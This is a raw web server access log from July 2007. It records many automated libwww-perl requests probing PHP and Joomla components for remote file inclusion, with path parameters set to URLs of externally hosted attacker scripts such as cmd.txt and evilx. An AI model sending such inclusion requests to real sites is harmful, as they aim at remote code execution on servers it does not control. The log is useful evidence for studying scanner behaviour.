83.16.15.42 - - [22/Jul/2007:17:32:54 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:17:32:54 -0700] "GET /logs/access.log//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
67.18.10.148 - - [22/Jul/2007:17:33:44 -0700] "GET /logs/access.log//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.11.33.11 - - [22/Jul/2007:17:33:47 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
204.11.33.11 - - [22/Jul/2007:17:33:47 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
206.51.227.146 - - [22/Jul/2007:17:33:58 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
206.51.227.146 - - [22/Jul/2007:17:33:59 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
70.84.7.74 - - [22/Jul/2007:17:34:13 -0700] "GET /logs/access.log//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
206.51.227.146 - - [22/Jul/2007:17:35:16 -0700] "GET /logs//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
206.51.227.146 - - [22/Jul/2007:17:35:16 -0700] "GET //myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
85.10.128.248 - - [22/Jul/2007:17:35:48 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:17:35:48 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:17:35:54 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:17:35:57 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:17:35:58 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
64.40.99.241 - - [22/Jul/2007:17:35:58 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
204.11.33.11 - - [22/Jul/2007:17:36:03 -0700] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
204.11.33.11 - - [22/Jul/2007:17:36:03 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
216.227.217.225 - - [22/Jul/2007:17:36:11 -0700] "GET /logs/access_070625.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.deutschetoscana.de/winwin/images/stories/winwin/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.11.33.11 - - [22/Jul/2007:17:36:26 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
216.227.217.225 - - [22/Jul/2007:17:36:26 -0700] "GET /logs/access_070618.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.deutschetoscana.de/winwin/images/stories/winwin/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.11.33.11 - - [22/Jul/2007:17:36:26 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
72.232.83.82 - - [22/Jul/2007:17:37:18 -0700] "GET /logs/access.log HTTP/1.1" 200 29970 "-" "Dpamcwuh oiqxyhru srexgtakd" "www.galf.org"
69.56.181.122 - - [22/Jul/2007:17:37:29 -0700] "GET /logs/access_070604.log/index.php?p=http://bapoz.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:38:03 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:38:04 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:17:38:42 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:17:38:46 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:38:47 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:17:39:02 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:17:39:02 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
204.11.33.11 - - [22/Jul/2007:17:40:48 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
204.11.33.11 - - [22/Jul/2007:17:40:48 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
204.11.33.11 - - [22/Jul/2007:17:40:49 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:41:27 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:42:00 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
85.158.202.29 - - [22/Jul/2007:17:42:00 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
209.216.252.124 - - [22/Jul/2007:17:42:20 -0700] "GET /logs/access.log/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:42:54 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:42:54 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:43:02 -0700] "GET /logs/access.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
65.69.224.10 - - [22/Jul/2007:17:43:19 -0700] "GET /logs/index2.php?page=http://www.redcluster.net/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
65.69.224.10 - - [22/Jul/2007:17:43:19 -0700] "GET /index2.php?page=http://www.redcluster.net/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.158.202.29 - - [22/Jul/2007:17:44:32 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:44:32 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
209.216.252.124 - - [22/Jul/2007:17:44:48 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.216.252.124 - - [22/Jul/2007:17:44:49 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:17:44:56 -0700] "GET /logs/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:17:45:00 -0700] "GET /myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:17:47:15 -0700] "GET /logs/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.10.128.248 - - [22/Jul/2007:17:47:16 -0700] "GET /myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:47:16 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:47:16 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:47:43 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:47:44 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
209.216.252.124 - - [22/Jul/2007:17:48:03 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.216.252.124 - - [22/Jul/2007:17:48:03 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
206.51.227.146 - - [22/Jul/2007:17:49:02 -0700] "GET /logs/access.log//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
206.51.227.146 - - [22/Jul/2007:17:49:23 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:17:49:36 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.38.28.199 - - [22/Jul/2007:17:49:36 -0700] "GET /logs//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
218.38.28.199 - - [22/Jul/2007:17:49:37 -0700] "GET //myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:17:49:39 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.57.197 - - [22/Jul/2007:17:49:49 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cashcrash.de/admin/css/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.57.197 - - [22/Jul/2007:17:49:50 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cashcrash.de/admin/css/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:51:17 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:51:18 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
218.38.28.199 - - [22/Jul/2007:17:51:23 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
218.38.28.199 - - [22/Jul/2007:17:51:23 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:52:08 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:52:08 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:53:01 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
85.158.202.29 - - [22/Jul/2007:17:53:01 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:53:02 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
204.11.33.11 - - [22/Jul/2007:17:53:42 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
204.11.33.11 - - [22/Jul/2007:17:53:42 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.230.218.91 - - [22/Jul/2007:17:54:13 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.allexxx.xpg.com.br/rootlab.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.230.218.91 - - [22/Jul/2007:17:54:13 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.allexxx.xpg.com.br/rootlab.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:17:54:37 -0700] "GET /logs/access.log/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
217.172.178.222 - - [22/Jul/2007:17:54:49 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.openonline.org/chat/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.172.178.222 - - [22/Jul/2007:17:54:49 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.openonline.org/chat/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:17:56:22 -0700] "GET /logs/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:17:56:23 -0700] "GET /myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
74.6.25.227 - - [22/Jul/2007:17:56:53 -0700] "GET /cendoc/?M=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
217.172.178.222 - - [22/Jul/2007:17:57:48 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.openonline.org/chat/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.172.178.222 - - [22/Jul/2007:17:57:48 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.openonline.org/chat/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:58:25 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:58:25 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.230.218.91 - - [22/Jul/2007:17:58:33 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.allexxx.xpg.com.br/rootlab.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
216.227.217.225 - - [22/Jul/2007:17:58:44 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/config-global.php?_SESSION[docroot_path]=http://www.deutschetoscana.de/winwin/images/stories/winwin/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.227.217.225 - - [22/Jul/2007:17:58:46 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/config-global.php?_SESSION[docroot_path]=http://www.deutschetoscana.de/winwin/images/stories/winwin/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.227.217.225 - - [22/Jul/2007:17:58:49 -0700] "GET /logs/access.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/config-global.php?_SESSION[docroot_path]=http://www.deutschetoscana.de/winwin/images/stories/winwin/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
200.226.246.22 - - [22/Jul/2007:18:00:18 -0700] "GET /logs/index.php?inc=http://www.freewebs.com/rafaelmaster/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.226.246.22 - - [22/Jul/2007:18:00:22 -0700] "GET /index.php?inc=http://www.freewebs.com/rafaelmaster/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:18:00:46 -0700] "GET /logs/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:18:00:46 -0700] "GET /myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
150.185.222.15 - - [22/Jul/2007:18:01:41 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:18:01:42 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
61.222.36.82 - - [22/Jul/2007:18:01:43 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
150.185.222.15 - - [22/Jul/2007:18:01:46 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.222.36.82 - - [22/Jul/2007:18:01:47 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:18:01:48 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
85.158.202.29 - - [22/Jul/2007:18:02:20 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
62.149.227.167 - - [22/Jul/2007:18:04:32 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.openonline.org/chat/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.149.227.167 - - [22/Jul/2007:18:04:33 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.openonline.org/chat/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
83.16.15.42 - - [22/Jul/2007:18:04:37 -0700] "GET /logs//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:18:04:40 -0700] "GET //myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:18:05:21 -0700] "GET /logs/access.log/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
65.38.168.180 - - [22/Jul/2007:18:05:32 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://lifechangerscc.com//catalog/download/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
65.38.168.180 - - [22/Jul/2007:18:05:32 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://lifechangerscc.com//catalog/download/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
